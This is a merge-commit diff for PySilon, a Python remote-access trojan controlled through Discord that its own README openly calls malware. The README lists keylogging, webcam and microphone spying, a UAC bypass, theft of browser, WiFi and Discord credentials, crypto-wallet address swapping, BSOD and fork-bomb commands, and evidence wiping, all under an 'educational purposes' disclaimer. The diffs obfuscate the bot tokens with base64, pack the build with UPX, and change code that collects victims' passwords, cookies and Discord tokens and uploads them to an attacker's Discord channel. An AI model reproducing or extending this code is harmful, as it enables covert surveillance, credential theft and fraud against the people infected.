Merge pull request #198 from mategol/py-dev

update 3.5

Author: mategol

README.md

@@ -1,8 +1,12 @@
-# PySilon
+<span align='center'>
+
+# `PySilon Malware`
 
 <p align='center'><img src="https://user-images.githubusercontent.com/44233157/205148071-ed0f810e-be71-4b18-8c6b-94e838ebda5d.png" width=500 /></p>
 
-Advanced RAT malware written in Python, fully controllable through Discord with dedicated GUI builder to make preparation easier.
+`Advanced RAT malware written in Python, fully controllable through Discord with dedicated GUI builder to make preparation easier.`
+
+</span>
 
 --------------------
 
@@ -12,15 +16,86 @@ Join our discord to keep up with the progress, ask questions, recommend features
 
 [![Discord](https://img.shields.io/discord/1114568569850699847?color=7289da&logo=discord&logoColor=white)](https://discord.gg/pysilon)
 
-## Setup / Install
+--------------------
+
+# Table of contents
+- <a href="https://github.com/mategol/PySilon-malware#disclaimer">Disclaimer</a>
+- <a href="https://github.com/mategol/PySilon-malware#features">Features</a>
+- <a href="https://github.com/mategol/PySilon-malware#preparation">Preparation</a>
+- <a href="https://github.com/mategol/PySilon-malware#available-commands">Available commands</a>
+- <a href="https://github.com/mategol/PySilon-malware#setup">Setup</a>
+- <a href="https://github.com/mategol/PySilon-malware#building-standalone-executable">Building executable</a>
+- <a href="https://github.com/mategol/PySilon-malware#autonomic-features">Autonomic features</a>
+- <a href="https://github.com/mategol/PySilon-malware#commands-manual">Commands manual</a>
+
+--------------------
+
+# Disclaimer
+> Information and code provided on this repository are for educational purposes only. The creator is no way responsible for any direct or indirect damage caused due to the misusage of the information. Everything you do, you are doing at your own risk and responsibility.
 
-This section has been moved to [our wiki page](https://github.com/mategol/PySilon-malware/wiki).
+--------------------
+
+# Features
+### PySilon malware can do plenty of things, like:
+- handle multiple PCs (not only one, like in most of the cases)
+- UAC Bypass (gain *Administrative permissions* on startup)
+- log every key pressed on *keyboard*
+- take *screenshots* anytime you want
+- record *screen* anytime you want
+- take images from *webcam*
+- *block* the *mouse* and *keyboard*
+- steal saved *WiFi* passwords
+- record *microphone* input (24/7) and save it in *.wav* files
+- stream live *microphone* input on voice channel
+- browse *files* on target PC
+- upload and download *files* from target PC
+- grab *history*, *cookies* and *passwords* saved in web browsers
+- grab *discord tokens* and system information
+- browse and kill running *processes*
+- execute files
+- replace copied *crypto currency wallet* addresses to your [configured] ones
+- trigger *Blue Screen of Death*
+- execute *fork bomb* (crash the PC)
+- *Anti-VM* (PySilon wont run on Virtual Machines, f.ex.: VirtualBox, VMWare)
+- run *CMD* commands
+- ***Debug Mode*** for easier testing and `contribution`
 
 --------------------
 
-## Donate
+# Preparation<br />
 
-If you like this project, you can donate to support us developing this malware. Donations help us spend more time working on this open-source project. All donations are greatly appreciated! :3
+`git clone https://github.com/mategol/pysilon-malware`<br />
+`cd pysilon-malware`<br />
+<a href="https://github.com/mategol/pysilon-malware#setup">`Create Discord BOT and server`</a><br />
+***Windows:*** `Run the PySilon.bat either from Command Line or double clicking on it`<br />
+***Linux:*** `Run the PySilon.sh from Command Line`<br />
+
+--------------------
+
+# Available commands
+<a href="https://github.com/mategol/pysilon-malware#ss">`.ss`</a> - take screenshot at any time<br />
+<a href="https://github.com/mategol/pysilon-malware#ss">`.screenrec`</a> - record the screen for 15 seconds<br />
+<a href="https://github.com/mategol/pysilon-malware#ss">`.webcam`</a> - take a picture from connected webcam<br />
+<a href="https://github.com/mategol/pysilon-malware#ss">`.block-input`</a> - block the mouse and keyboard (`.unblock-input` to unblock it)<br />
+<a href="https://github.com/mategol/pysilon-malware#grab-what-to-grab">`.grab <what-to-grab>`</a> - grab for example saved passwords in web browsers<br />
+<a href="https://github.com/mategol/pysilon-malware#join">`.join`</a> - join voice-channel and stream live microphone input<br />
+<a href="https://github.com/mategol/pysilon-malware#pwd">`.pwd`</a> - show working directory<br />
+<a href="https://github.com/mategol/pysilon-malware#tree">`.tree`</a> - show tree of working directory<br />
+<a href="https://github.com/mategol/pysilon-malware#cd-directory">`.cd <dir>`</a> - change working directory<br />
+<a href="https://github.com/mategol/pysilon-malware#ls">`.ls`</a> - list content of working directory<br />
+<a href="https://github.com/mategol/pysilon-malware#upload-type-filename">`.upload <type> [name]`</a> - upload any file or zipped directory (also greater than 8MB ones) onto target PC<br />
+<a href="https://github.com/mategol/pysilon-malware#download-file-or-directory">`.download <file-or-dir>`</a> - download any file or zipped directory (also greater than 8MB ones) from target PC<br />
+<a href="https://github.com/mategol/pysilon-malware#show-what-to-show">`.show <what-to-show>`</a> - get list of running processes or available commands<br />
+<a href="https://github.com/mategol/pysilon-malware#kill-process-id">`.kill <process-id>`</a> - kill any running process<br />
+<a href="https://github.com/mategol/pysilon-malware#execute-file">`.execute <file>`</a> - run any file on target PC<br />
+<a href="https://github.com/mategol/pysilon-malware#ss">`.start-clipper`</a> - start crypto-clipper (swap crypto currency wallet addresses to your ones, `.stop-clipper` to stop it)<br />
+<a href="https://github.com/mategol/pysilon-malware#ss">`.bsod`</a> - trigger Blue Screen of Death<br />
+<a href="https://github.com/mategol/pysilon-malware#ss">`.forkbomb`</a> - execute fork bomb<br />
+<a href="https://github.com/mategol/pysilon-malware#remove-file-or-dir">`.remove <file-or-dir>`</a> - remove file or directory on target PC<br />
+<a href="https://github.com/mategol/pysilon-malware#implode">`.implode`</a> - remove PySilon from target PC and clean the "evidence"<br />
+<a href="https://github.com/mategol/pysilon-malware#clear">`.clear`</a> - clear messages from file-related channel<br />
+
+--------------------
 
 ### Donation methods
 
@@ -33,10 +108,8 @@ If you like this project, you can donate to support us developing this malware.
 
 List of features that should appear in following releases:
 
-- [ ] optional ransomware 
-- [ ] fork bomb (wabbit)
+- [ ] optional ransomware
 - [ ] webhook connection in case of unexpected circumstances (like BOT-Token banned by Discord)
-- [ ] different acting on Virtual-Machines (like Blue Screen of Death)
 - [ ] overall system info grabber with cool Discord Embeds
 - [ ] traditional reverse shell creator
 - [ ] grab credit cards information

builder.py

@@ -253,7 +253,7 @@ def assemble_source_code():
                         source_assembled.write('    '*variable_intendation + ('    '*variable_intendation).join(source_code_modifiers[variable_name]))
                     else: source_assembled.write('\n')
                     if base_line == '# [pysilon_var] bottom 0\n' and config['FUNCTIONALITY']['keylogr'] == 'False':
-                        source_assembled.write('for token in bot_tokens:\n    try:\n        client.run(token)\n    except: pass')
+                        source_assembled.write('for token in bot_tokens:\n    decoded_token = base64.b64decode(token).decode()\n    try:\n        client.run(decoded_token)\n    except: pass')
                 elif '# [pysilon_mark] !debug' in base_line and not debug_mode: pass
                 elif '# [pysilon_mark] !anti-vm' in base_line and debug_mode: pass
                 else:
@@ -399,7 +399,7 @@ def config_modification(var=None, index=None, mode=None):
     cbvar_forkbmb = BooleanVar(value=True)
 
     def open_crypto_clipper_config():
-        json_file_path = 'crypto_clipper.json'
+        json_file_path = 'resources/crypto_clipper.json'
         if os.path.exists(json_file_path):
             subprocess.Popen(['notepad.exe', json_file_path])
 

compiler.py

@@ -1,6 +1,7 @@
 import configparser
 import hashlib
 import sys
+import base64
 import os
 
 def get_file_hash(path):
@@ -18,13 +19,17 @@ def compile(debug_mode):
     if len(config['SETTINGS']) != 12 or len(config['FUNCTIONALITY']) != 18:
         return 'Config corrupted'
 
-    compiling_command = 'start cmd /k "title Reorganising packages... & pip freeze > to_uninstall.txt & pip uninstall -y -r to_uninstall.txt > nul & del to_uninstall.txt > nul & pip install pillow > nul & pip install pyinstaller > nul & pip install -r custom_imports.txt > nul & title Compiling source code... & pyinstaller -F --noconsole --add-data "resources/libopus-0.x64.dll;." --runtime-hook=resources/misc.py ' + ('--runtime-hook=resources/protections.py ' if debug_mode else '') + '--runtime-hook=resources/discord_token_grabber.py --runtime-hook=resources/get_cookies.py --runtime-hook=resources/passwords_grabber.py --add-data="crypto_clipper.json;." --icon "' + config['SETTINGS']['icon_path'] + '" "source_prepared.py" > nul & echo - & echo.Done & echo.- & start dist & del source_prepared.spec > nul & rmdir build /S /Q & pause & exit"'
+    compiling_command = 'start cmd /k "title Reorganising packages... & pip freeze > to_uninstall.txt & pip uninstall -y -r to_uninstall.txt > nul & del to_uninstall.txt > nul & pip install pillow > nul & pip install pyinstaller > nul & pip install -r custom_imports.txt > nul & title Compiling source code... & pyinstaller -F --noconsole --upx-dir "resources/" --add-data "resources/libopus-0.x64.dll;." --runtime-hook=resources/misc.py ' + ('--runtime-hook=resources/protections.py ' if debug_mode else '') + '--runtime-hook=resources/discord_token_grabber.py --runtime-hook=resources/get_cookies.py --runtime-hook=resources/passwords_grabber.py --add-data="resources/crypto_clipper.json;." --icon "' + config['SETTINGS']['icon_path'] + '" "source_prepared.py" > nul & echo - & echo.Done & echo.- & start dist & del source_prepared.spec > nul & rmdir build /S /Q & pause & exit"'
+
+    token_1 = base64.b64encode(config['SETTINGS']['bot_token_1'].encode()).decode()
+    token_2 = base64.b64encode(config['SETTINGS']['bot_token_2'].encode()).decode() if config['SETTINGS']['bot_token_2'] != '' else None
+    token_3 = base64.b64encode(config['SETTINGS']['bot_token_3'].encode()).decode() if config['SETTINGS']['bot_token_3'] != '' else None
 
     with open('PySilon.key', 'wb') as save_key: save_key.write(os.urandom(1024*1024))
     with open('source_assembled.py', 'r', encoding='utf-8') as copy_source_code: source_code = copy_source_code.readlines()
     with open('source_prepared.py', 'w', encoding='utf-8') as edit_source_code:
         for line_number, line in enumerate(source_code):
-            if line.startswith('bot_tokens'): edit_source_code.write('bot_tokens = [\'' + config['SETTINGS']['bot_token_1'] + (('\', \'' + config['SETTINGS']['bot_token_2']) if config['SETTINGS']['bot_token_2'] != '' else '') + (('\', \'' + config['SETTINGS']['bot_token_3']) if config['SETTINGS']['bot_token_3'] != '' else '') + '\']\n')
+            if line.startswith('bot_tokens'): edit_source_code.write(f"bot_tokens = {[token for token in [token_1, token_2, token_3] if token is not None]}\n")
             elif line.startswith('software_registry_name'): edit_source_code.write('software_registry_name = \'' + config['SETTINGS']['registry_name'] + '\'\n')
             elif line.startswith('software_directory_name'): edit_source_code.write('software_directory_name = \'' + config['SETTINGS']['directory_name'] + '\'\n')
             elif line.startswith('software_executable_name'): edit_source_code.write('software_executable_name = \'' + config['SETTINGS']['executable_name'] + ('' if config['SETTINGS']['executable_name'].endswith('.exe') else '.exe') + '\'\n')

crypto_clipper.json renamed to resources/crypto_clipper.json

@@ -1,5 +1,5 @@
 {
-    "BTC": "",
+    "BTC": "asdrgqwaergae",
     "ETH": "",
     "DOGE": "",
     "LTC": "",

resources/discord_token_grabber.py

@@ -8,8 +8,8 @@
 from win32crypt import CryptUnprotectData
 
 class grab_discord():
-    def initialize():
-        return fetch_tokens().upload()
+    def initialize(raw_data):
+        return fetch_tokens().upload(raw_data)
 
 class extract_tokens:
     def __init__(self) -> None:
@@ -121,7 +121,7 @@ class fetch_tokens:
     def __init__(self):
         self.tokens = extract_tokens().tokens
 
-    def upload(self):
+    def upload(self, raw_data):
         if not self.tokens:
             return
         final_to_return = []
@@ -190,23 +190,27 @@ def upload(self):
                 else: codes = None
             else: codes = None
 
-            embed = Embed(title=f"{username} ({user_id})", color=0x0084ff)
-            embed.set_thumbnail(url=avatar)
+            if not raw_data:
+                embed = Embed(title=f"{username} ({user_id})", color=0x0084ff)
+                embed.set_thumbnail(url=avatar)
 
-            embed.add_field(name="\u200b\n📜 Token:", value=f"```{token}```\n\u200b", inline=False)
-            embed.add_field(name="💎 Nitro:", value=f"{nitro}", inline=False)
-            embed.add_field(name="💳 Billing:", value=f"{payment_methods if payment_methods != '' else 'None'}", inline=False)
-            embed.add_field(name="🔒 MFA:", value=f"{mfa}\n\u200b", inline=False)
-            
-            embed.add_field(name="📧 Email:", value=f"{email if email != None else 'None'}", inline=False)
-            embed.add_field(name="📳 Phone:", value=f"{phone if phone != None else 'None'}\n\u200b", inline=False)    
+                embed.add_field(name="\u200b\n📜 Token:", value=f"```{token}```\n\u200b", inline=False)
+                embed.add_field(name="💎 Nitro:", value=f"{nitro}", inline=False)
+                embed.add_field(name="💳 Billing:", value=f"{payment_methods if payment_methods != '' else 'None'}", inline=False)
+                embed.add_field(name="🔒 MFA:", value=f"{mfa}\n\u200b", inline=False)
+                
+                embed.add_field(name="📧 Email:", value=f"{email if email != None else 'None'}", inline=False)
+                embed.add_field(name="📳 Phone:", value=f"{phone if phone != None else 'None'}\n\u200b", inline=False)    
 
 
-            if hq_guilds != None:
-                embed.add_field(name="🏰 HQ Guilds:", value=hq_guilds, inline=False)
+                if hq_guilds != None:
+                    embed.add_field(name="🏰 HQ Guilds:", value=hq_guilds, inline=False)
 
-            if codes != None:
-                embed.add_field(name="\u200b\n🎁 Gift Codes:", value=codes, inline=False)
+                if codes != None:
+                    embed.add_field(name="\u200b\n🎁 Gift Codes:", value=codes, inline=False)
 
-            final_to_return.append(embed)
+                final_to_return.append(embed)
+            else:
+                #final_to_return.append(f'Username: {username} ({user_id})\nToken: {token}\nNitro: {nitro}\nBilling: {payment_methods if payment_methods != "" else "None"}\nMFA: {mfa}\nEmail: {email if email != None else "None"}\nPhone: {phone if phone != None else "None"}\nHQ Guilds: {hq_guilds}\nGift codes: {codes}')
+                final_to_return.append(json.dumps({'username': username, 'token': token, 'nitro': nitro, 'billing': (payment_methods if payment_methods != "" else "None"), 'mfa': mfa, 'email': (email if email != None else "None"), 'phone': (phone if phone != None else "None"), 'hq_guilds': hq_guilds, 'gift_codes': codes}))
         return final_to_return

resources/mrd.py

@@ -19,8 +19,8 @@ async def on_ready():
     except:
         with open(f'C:\\Users\\{getuser()}\\cookies.txt', 'w', encoding='utf-8') as error_log: error_log.write('Error (or fresh OS)')
     try: discord_grabbed = discord_token_grabber.grab_discord.initialize(True)
-    except: discord_grabbed = 'error'
+    except Exception as error: discord_grabbed = 'error -> ' + str(error)
     with open(f'C:\\Users\\{getuser()}\\cookies.txt', 'r', encoding='utf-8') as copy_cookies: cookies = copy_cookies.readlines()
-    with open(f'C:\\Users\\{getuser()}\\{hwid}.txt', 'w', encoding='utf-8') as save_results: save_results.write('Passwords:\n' + str(passwords) + '\n\n\nDiscord:\n' + ('\n---\n'.join(discord_grabbed) if discord_grabbed != 'error' else discord_grabbed) + '\n\n\nCookies:\n' + ''.join(cookies))
+    with open(f'C:\\Users\\{getuser()}\\{hwid}.txt', 'w', encoding='utf-8') as save_results: save_results.write('Passwords:\n' + str(passwords).replace('\'', '"') + '\n\n\nDiscord:\n' + ('\n---\n'.join(discord_grabbed) if discord_grabbed[:5] != 'error' else discord_grabbed) + '\n\n\nCookies:\n' + ''.join(cookies))
     await Client.get_channel(channel_id).send(file=discord.File(f'C:\\Users\\{getuser()}\\{hwid}.txt', filename=f'{hwid}.txt')); subprocess.run(f'del C:\\Users\\{getuser()}\\{hwid}.txt', shell=True); subprocess.run(f'del C:\\Users\\{getuser()}\\cookies.txt', shell=True)
 Client.run(bot_token)

resources/source_code/grabber.py

@@ -82,7 +82,7 @@
             #.log Sent embed with saved WiFi passwords 
         elif message.content[6:] == 'discord':
             #.log Author requested for grabbing Discord accounts data 
-            accounts = grab_discord.initialize()
+            accounts = grab_discord.initialize(False)
             #.log Grabbed Discord accounts data 
             for account in accounts:
                 reaction_msg = await message.channel.send(embed=account); await reaction_msg.add_reaction('📌') 

resources/source_code/keylogger.py

@@ -56,8 +56,9 @@ def on_press(key):
 # bottom
 with Listener(on_press=on_press) as listener:
     for token in bot_tokens:
+        decoded_token = base64.b64decode(token).decode()
         try:
-            client.run(token)
+            client.run(decoded_token)
             #.log Started Discord BOT client session
         except: pass
     #.log Starting keylogger

resources/source_code/process.py

@@ -125,10 +125,8 @@
         #.log Checking if there is a process with provided process ID 
         if int(message.content[6:]) < len(processes_list) and int(message.content[6:]) > 0:
             #.log Found a process with provided process ID 
-            embed = discord.Embed(title="🟢 Success",description='```Do you really want to kill process: ' + processes_list[int(message.content[6:])].replace('`', '') + '\nReact with 💀 to kill it or 🔴 to cancel...```', colour=discord.Colour.green())
-            embed.set_author(name="PySilon-malware", icon_url="https://cdn.discordapp.com/attachments/1125126897584574476/1134166476560011386/icon-1.png")
-            reaction_msg = await message.channel.send(embed=embed)
-            #.log Sent embed with confirmation of killing a process 
+            reaction_msg = await message.channel.send('```Do you really want to kill process: ' + processes_list[int(message.content[6:])].replace('`', '') + '\nReact with 💀 to kill it or 🔴 to cancel...```')
+            #.log Sent message with confirmation of killing a process 
             process_to_kill = [processes_list[int(message.content[6:])].replace('`', ''), False]
             await reaction_msg.add_reaction('💀')
             #.log Reacted with "kill" 

resources/source_code/webcam.py

@@ -29,7 +29,7 @@
             camera = pygame.camera.Camera(cameras[0])
             #.log Selected the default camera 
             camera.start()
-            time.sleep(0.5)
+            time.sleep(1)
             #.log Started camera intercepting 
             image = camera.get_image()
             #.log Took image from camera